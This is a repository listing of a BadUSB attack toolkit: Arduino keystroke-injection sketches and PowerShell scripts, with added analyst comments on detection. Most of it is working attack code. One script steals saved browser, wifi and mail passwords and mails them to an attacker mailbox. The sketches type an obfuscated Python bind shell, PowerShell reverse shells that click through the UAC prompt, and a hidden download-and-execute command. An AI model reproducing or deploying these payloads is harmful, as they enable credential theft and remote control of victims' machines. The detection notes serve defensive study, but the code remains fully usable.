├── Command.rar
├── GetPass.ps1
├── GetPass.rar
├── README.md
├── ino_code
    ├── BlueScreen(xp,win7).ino
    ├── ChangeCurrentUserPass(all).ino
    ├── DeleteDiskCFiles(all).ino
    ├── KaliPWN.ino
    ├── PowerShellDownload(win7,8).ino
    ├── SetBackdoor(all).ino
    ├── local_reverse_shell.ino
    ├── ps_download_execute_Leonrado.ino
    └── ps_reverse_shell(all_with_ps).ino
└── main.ps1


/Command.rar:
--------------------------------------------------------------------------------
(D:\Get.exe sysadmin & D:\Get.exe svn & D:\Get.exe database & D:\Get.exe browsers & D:\Get.exe wifi & D:\Get.exe mails) > D:\GetPass.txt


--------------------------------------------------------------------------------
/GetPass.ps1:
--------------------------------------------------------------------------------
# GetPass.ps1 -- analyst notes.
#
# What the script does, in order:
#   1. Saves two remote files to D:\ under different extensions than they are
#      served with: GetPass.rar -> D:\Get.exe and Command.rar -> D:\Command.bat.
#      Both URLs are plain http://, and the host is redacted (www.xxx.xxx).
#   2. Runs D:\Command.bat. Per the /Command.rar listing, that batch file calls
#      D:\Get.exe six times (sysadmin, svn, database, browsers, wifi, mails) and
#      redirects the combined output to D:\GetPass.txt.
#   3. Mails D:\GetPass.txt as an attachment through smtp.qq.com on port 587
#      using credentials embedded in the script (redacted here).
#   4. Deletes D:\GetPass.txt and D:\Get.exe. D:\Command.bat is NOT deleted, so
#      it remains on disk as an artifact.
#
# Detection and response pointers:
#   - WebClient.DownloadFile writing an .exe/.bat whose source URL ends in .rar
#     is an extension mismatch worth alerting on in proxy and EDR telemetry.
#   - PowerShell script block logging (event 4104) records the script text,
#     including the SMTP account name and password; treat that mailbox as an
#     investigation pivot.
#   - A workstation process opening an SMTP submission session (TCP 587) to a
#     public mail provider is unusual; egress filtering would stop step 3.
#   - The script assumes a writable D: drive; file-creation events for
#     D:\Get.exe, D:\Command.bat and D:\GetPass.txt are the on-disk indicators.

# Stage 1: fetch the executable; served as .rar, written as .exe.
(new-object System.Net.WebClient).DownloadFile('http://www.xxx.xxx/GetPass.rar','D:\Get.exe');

# Stage 1: fetch the batch wrapper; served as .rar, written as .bat.
(new-object System.Net.WebClient).DownloadFile('http://www.xxx.xxx/Command.rar','D:\Command.bat');

# Stage 2: run the batch wrapper, which produces D:\GetPass.txt.
D:\Command.bat;
$SMTPServer = 'smtp.qq.com'

# Stage 3: SMTP client on the submission port with TLS enabled.
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)

$SMTPInfo.EnableSsl = $true

# Hard-coded mailbox credentials (redacted in this listing).
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxxx@qq.com', 'olawgxxxxxxx');

$ReportEmail = New-Object System.Net.Mail.MailMessage

# Sender and recipient are the same redacted address.
$ReportEmail.From = 'xxxxx@qq.com'

$ReportEmail.To.Add('xxxxx@qq.com')

# Fixed subject and body strings: usable as mail-gateway match terms.
$ReportEmail.Subject = 'GetPass'

$ReportEmail.Body = 'GetPass_text'

# The collected output leaves the host as a mail attachment.
$ReportEmail.Attachments.Add('D:\GetPass.txt')
# SmtpClient.Timeout is in milliseconds, so this allows roughly 16 minutes.
$SMTPInfo.Timeout = 1000000
$SMTPInfo.Send($ReportEmail)
# Releases the attachment's file handle so the file can be deleted below.
$ReportEmail.Attachments.Dispose()

# Stage 4: cleanup of two of the three dropped files (Command.bat is left).
remove-item 'D:\GetPass.txt'

remove-item 'D:\Get.exe'


--------------------------------------------------------------------------------
/GetPass.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/GetPass.rar


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# BadUSB-code
收集badusb的一些利用方式及代码

ino_code 中的.ino代码为上传到硬件的代码,无需服务器中配置。

##代码涉及OS版本
代码适用版本在文件名中用括号标明。
- win xp,7,8,10
- Kali

## 原理及制作可参考:
[乐枕的家——BadUSB原理浅析及制作指南](https://www.cdxy.me/?p=549)

特别感谢HackPanda大牛的代码和技术支持!向前辈学习!


--------------------------------------------------------------------------------
/ino_code/BlueScreen(xp,win7).ino:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/BlueScreen(xp,win7).ino


--------------------------------------------------------------------------------
/ino_code/ChangeCurrentUserPass(all).ino:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/ChangeCurrentUserPass(all).ino


--------------------------------------------------------------------------------
/ino_code/DeleteDiskCFiles(all).ino:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/DeleteDiskCFiles(all).ino


--------------------------------------------------------------------------------
/ino_code/KaliPWN.ino:
--------------------------------------------------------------------------------
/**
 * File: Arduino sketch for Arduino Micro.
 * Arduino opens up gnome-terminal, runs python shell, and changes background
 * Python shell opens up on 1338 unless edited.
 * Background is set to http://i.imgur.com/3Novb98.jpg
 * This attack is designed for Kali Linux systems.
 *
 * Analyst notes:
 * - The board acts as a USB keyboard; everything below is typed into whatever
 *   window has focus, using fixed delays rather than any feedback from the host.
 * - Host-side indicators: a python process started with "-c" and a base64
 *   argument, a new TCP listener on port 1338, a wget of the image URL above,
 *   and gsettings changes to org.gnome.desktop.background.
 * - Preventive controls are at the USB layer (authorising new HID devices
 *   before they can type) and screen locking; the sketch needs an unlocked
 *   desktop session.
 */

// Presses Alt+F2, then types `command` and presses Return.
// gnomeTerminal() uses this to start gnome-terminal, so Alt+F2 is presumably
// the desktop's "run command" dialog -- confirm for the target desktop.
void f2Run(char command[]) {
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F2);
  delay(200);
  Keyboard.releaseAll();
  delay(500);  // fixed wait for the dialog to appear
  Keyboard.begin();
  Keyboard.print(command);
  Keyboard.end();
  delay(100);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(100);
}

// Types `command` followed by Return into the currently focused window.
void runCommand(char command[]) {
  Keyboard.begin();
  Keyboard.print(command);
  Keyboard.end();
  delay(100);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(100);
}

// Opens gnome-terminal through f2Run() and waits 1.5 s for it to take focus.
void gnomeTerminal() {
  f2Run("gnome-terminal");
  delay(1500);
}

// Types a backgrounded ("&") python one-liner that sets p=1338 and then
// eval()s a base64-encoded script.
// NOTE(review): the encoded text appears to be a TCP listener that binds an
// empty host string on port p and passes whatever it receives to
// subprocess.check_output(..., shell=True). Nothing in it authenticates the
// peer, so any host that can reach the port would get command execution as
// the logged-in user. An unexpected python listener on 1338 is the indicator.
void shell() {
  // python shell
  runCommand("python -c \"import base64;p=1338;eval(compile(base64.b64decode('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcwpoID0gJycKI3AgPSAxMzM4CnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCnMuc2V0c29ja29wdChzb2NrZXQuU09MX1NPQ0tFVCwgc29ja2V0LlNPX1JFVVNFQUREUiwgMSkKcy5iaW5kKChoLCBwKSkKcy5saXN0ZW4oMTApCndoaWxlIDE6CiAgYywgYWRkcmVzcyA9IHMuYWNjZXB0KCkKICB3aGlsZSAxOgogICAgZCA9IGMucmVjdigxMDI0KQogICAgaWYgKGQgPT0gIiIpOgogICAgICBicmVhawogICAgYy5zZW5kKHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KGQsIHNoZWxsPVRydWUpKQogIGMuY2xvc2UoKQpzLmNsb3NlKCkK'), '', 'exec'));\" &");
}

// Downloads an image over plain HTTP into the terminal's working directory and
// sets it as the GNOME background. A changed wallpaper and a stray
// 3Novb98.jpg in the working directory are user-visible signs of the run.
void wallpaper() {
  // Image payloads are too big, sticking with wget.
  runCommand("wget http://i.imgur.com/3Novb98.jpg;gsettings set org.gnome.desktop.background picture-uri file://`pwd`/3Novb98.jpg;gsettings set org.gnome.desktop.background picture-options \"centered\"");
}

// Only opens the serial port; no keystrokes are sent from setup().
void setup() {
  Serial.begin(9600);
}

// The whole sequence lives in loop(), so it repeats for as long as the device
// stays plugged in: 3 s wait, terminal, shell, wallpaper, "exit", then a 60 s
// pause before the next round. Repeated identical terminal launches about a
// minute apart are therefore part of the pattern.
void loop() {
  delay(3000);
  gnomeTerminal();
  shell();
  wallpaper();
  runCommand("exit");
  delay(60000);
}


--------------------------------------------------------------------------------
/ino_code/PowerShellDownload(win7,8).ino:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/PowerShellDownload(win7,8).ino


--------------------------------------------------------------------------------
/ino_code/SetBackdoor(all).ino:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/SetBackdoor(all).ino


--------------------------------------------------------------------------------
/ino_code/local_reverse_shell.ino:
--------------------------------------------------------------------------------
// local_reverse_shell.ino -- analyst notes.
//
// The sketch runs once (everything is in setup()) and types, in order:
//   1. Ctrl+Esc, then a cmd.exe command line, confirmed with Ctrl+Shift+Enter
//      (the Windows shortcut that requests an elevated launch).
//   2. Alt+'y' after 2.5 s, presumably to answer the UAC consent dialog.
//   3. "powershell", then a script line by line that connects a TCP client to
//      $address:$port, starts cmd.exe with redirected stdin/stdout, and relays
//      data between the socket and that process.
//
// Detection and mitigation pointers:
//   - Step 2 only works against a Yes/No consent dialog. Standard (non-admin)
//     accounts get a credential prompt instead, which this sequence does not
//     fill in.
//   - Process telemetry: an elevated cmd.exe whose command line contains
//     "mode CON: COLS=16 LINES=1", a powershell.exe child, then a second
//     cmd.exe started by PowerShell with redirected standard streams.
//   - Network telemetry: an outbound TCP connection owned by powershell.exe.
//   - The script is typed interactively, so PowerShell script block logging
//     (event 4104), where enabled, records each line. Console history may
//     hold it as well -- verify on the PowerShell version in use.
//   - USB layer: device-installation restrictions for new HID keyboards stop
//     the sequence before the first keystroke.
void setup() {
  // put your setup code here, to run once:
  //reverse_shell via cmd(local)
  delay(5000);  // wait for the host to enumerate the device
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_ESC);
  Keyboard.releaseAll();
  delay(500);

  // /K keeps cmd.exe open; "mode CON" shrinks the window to 16 columns x 1 line.
  Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(2500);

  // Alt+'y' -- presumably the "Yes" accelerator of the UAC consent dialog.
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('y');
  Keyboard.releaseAll();
  delay(1500);
  Keyboard.println("powershell");
  delay(200);
  // From here on each println types one line of the PowerShell script.
  // cleanup: closes the TCP client and the child process, then exits.
  Keyboard.println("function cleanup {");
  Keyboard.println("if ($client.Connected -eq $true) {$client.Close()}");
  Keyboard.println("if ($process.ExitCode -ne $null) {$process.Close()}");
  Keyboard.println("exit}");
  // Remote host the typed script connects to. (The original note here read
  // "Setup 192.168.202.130 HERE"; the value actually typed is the one below.)
  Keyboard.println("$address = '192.168.1.8'");
  // Remote TCP port. (Original note: "Setup PORT HERE".)
  Keyboard.println("$port = '8000'");
  Keyboard.println("$client = New-Object system.net.sockets.tcpclient");
  Keyboard.println("$client.connect($address,$port)");
  Keyboard.println("$stream = $client.GetStream()");
  Keyboard.println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  // Child cmd.exe with redirected stdin/stdout and UseShellExecute disabled.
  Keyboard.println("$process = New-Object System.Diagnostics.Process");
  Keyboard.println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  Keyboard.println("$process.StartInfo.RedirectStandardInput = 1");
  Keyboard.println("$process.StartInfo.RedirectStandardOutput = 1");
  Keyboard.println("$process.StartInfo.UseShellExecute = 0");
  Keyboard.println("$process.Start()");
  Keyboard.println("$inputstream = $process.StandardInput");
  Keyboard.println("$outputstream = $process.StandardOutput");
  Keyboard.println("Start-Sleep 1");
  // Traffic is ASCII-encoded and sent as-is; the script adds no encryption, so
  // the session is readable in a packet capture.
  Keyboard.println("$encoding = new-object System.Text.AsciiEncoding");
  Keyboard.println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  Keyboard.println("$out = $null; $done = $false; $testing = 0;");
  // Relay loop: read from the socket up to a line feed (byte 10), write it to
  // the child's stdin, wait one second, send the child's output back.
  Keyboard.println("while (-not $done) {");
  Keyboard.println("if ($client.Connected -ne $true) {cleanup}");
  Keyboard.println("$pos = 0; $i = 1");
  Keyboard.println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  Keyboard.println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  Keyboard.println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  Keyboard.println("if ($pos -gt 0) {");
  Keyboard.println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  Keyboard.println("$inputstream.write($string)");
  Keyboard.println("start-sleep 1");
  Keyboard.println("if ($process.ExitCode -ne $null) {cleanup}");
  Keyboard.println("else {");
  Keyboard.println("$out = $encoding.GetString($outputstream.Read())");
  Keyboard.println("while($outputstream.Peek() -ne -1){");
  Keyboard.println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  Keyboard.println("$out = $null");
  Keyboard.println("$string = $null}} else {cleanup}}");
  Keyboard.println(""); //Enter to start execution

}

// Empty: nothing is typed again after setup() returns.
void loop() {
  // put your main code here, to run repeatedly:

}


--------------------------------------------------------------------------------
/ino_code/ps_download_execute_Leonrado.ino:
--------------------------------------------------------------------------------
// ps_download_execute_Leonrado.ino -- analyst notes.
//
// Types one command: a hidden-window PowerShell that downloads a script as a
// string over plain HTTP and passes it to IEX, so the script body is not
// written to disk by this command. The launch is confirmed with
// Ctrl+Shift+Enter and followed by Alt+'y', presumably for the UAC consent
// dialog.
//
// Detection pointers: the full command line (including the URL) appears in
// process-creation logging when command-line capture is enabled; script block
// logging (event 4104) records the downloaded script text when it runs; the
// HTTP request itself is visible to a proxy because the URL is not https.
// The contents of main.ps1 are not part of this listing.
void setup() {
  delay(5000);  // wait for the host to enumerate the device
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_ESC);
  Keyboard.releaseAll();
  delay(500);

  Keyboard.print("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://www.cdxy.me/main.ps1');");
  // Ctrl+Shift+Enter requests an elevated launch.
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(2500);

  // Alt+'y' -- presumably the "Yes" accelerator of the UAC consent dialog.
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('y');
  Keyboard.releaseAll();
  delay(1500);

}

// Empty: the sequence runs once per plug-in.
void loop() {}


--------------------------------------------------------------------------------
/ino_code/ps_reverse_shell(all_with_ps).ino:
--------------------------------------------------------------------------------
// ps_reverse_shell(all_with_ps).ino -- analyst notes.
//
// Same typed PowerShell relay script as local_reverse_shell.ino, with two
// differences visible in the code: PowerShell is launched directly (no cmd.exe
// step) with "-ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile
// -WindowStyle Hidden", and the remote address is a redacted placeholder with
// port 4444.
//
// Detection pointers: that exact flag combination on an elevated
// powershell.exe started from the Start menu is a strong command-line match
// term; the remaining indicators (child cmd.exe with redirected streams,
// outbound TCP owned by powershell.exe, script block logging of the typed
// lines) are the same as for the cmd-based variant.
void setup() {
  // reverse_shell with powershell(hidden)
  // edit by xy 16.01.24
  // mail:i@cdxy.me

  delay(5000);  // wait for the host to enumerate the device
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_ESC);
  Keyboard.releaseAll();
  delay(500);

  Keyboard.print("powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden");
  // Ctrl+Shift+Enter requests an elevated launch.
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(2500);

  // Alt+'y' -- presumably the "Yes" accelerator of the UAC consent dialog.
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('y');
  Keyboard.releaseAll();
  delay(1500);
  //Keyboard.println("powershell");
  //delay(200);
  // From here on each println types one line of the PowerShell script.
  // cleanup: closes the TCP client and the child process, then exits.
  Keyboard.println("function cleanup {");
  Keyboard.println("if ($client.Connected -eq $true) {$client.Close()}");
  Keyboard.println("if ($process.ExitCode -ne $null) {$process.Close()}");
  Keyboard.println("exit}");
  // Remote host the typed script connects to; redacted in this listing.
  // (Original note: "Setup 192.168.202.130 HERE".)
  Keyboard.println("$address = 'xxx.xxx.xxx.xxx'");
  // Remote TCP port. (Original note: "Setup PORT HERE".)
  Keyboard.println("$port = '4444'");
  Keyboard.println("$client = New-Object system.net.sockets.tcpclient");
  Keyboard.println("$client.connect($address,$port)");
  Keyboard.println("$stream = $client.GetStream()");
  Keyboard.println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  // Child cmd.exe with redirected stdin/stdout and UseShellExecute disabled.
  Keyboard.println("$process = New-Object System.Diagnostics.Process");
  Keyboard.println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  Keyboard.println("$process.StartInfo.RedirectStandardInput = 1");
  Keyboard.println("$process.StartInfo.RedirectStandardOutput = 1");
  Keyboard.println("$process.StartInfo.UseShellExecute = 0");
  Keyboard.println("$process.Start()");
  Keyboard.println("$inputstream = $process.StandardInput");
  Keyboard.println("$outputstream = $process.StandardOutput");
  Keyboard.println("Start-Sleep 1");
  // Traffic is ASCII-encoded and sent as-is; the script adds no encryption.
  Keyboard.println("$encoding = new-object System.Text.AsciiEncoding");
  Keyboard.println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  Keyboard.println("$out = $null; $done = $false; $testing = 0;");
  // Relay loop: read from the socket up to a line feed (byte 10), write it to
  // the child's stdin, wait one second, send the child's output back.
  Keyboard.println("while (-not $done) {");
  Keyboard.println("if ($client.Connected -ne $true) {cleanup}");
  Keyboard.println("$pos = 0; $i = 1");
  Keyboard.println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  Keyboard.println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  Keyboard.println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  Keyboard.println("if ($pos -gt 0) {");
  Keyboard.println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  Keyboard.println("$inputstream.write($string)");
  Keyboard.println("start-sleep 1");
  Keyboard.println("if ($process.ExitCode -ne $null) {cleanup}");
  Keyboard.println("else {");
  Keyboard.println("$out = $encoding.GetString($outputstream.Read())");
  Keyboard.println("while($outputstream.Peek() -ne -1){");
  Keyboard.println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  Keyboard.println("$out = $null");
  Keyboard.println("$string = $null}} else {cleanup}}");
  Keyboard.println(""); //Enter to start execution

}

// Empty: nothing is typed again after setup() returns.
void loop() {
  // put your main code here, to run repeatedly:

}

--------------------------------------------------------------------------------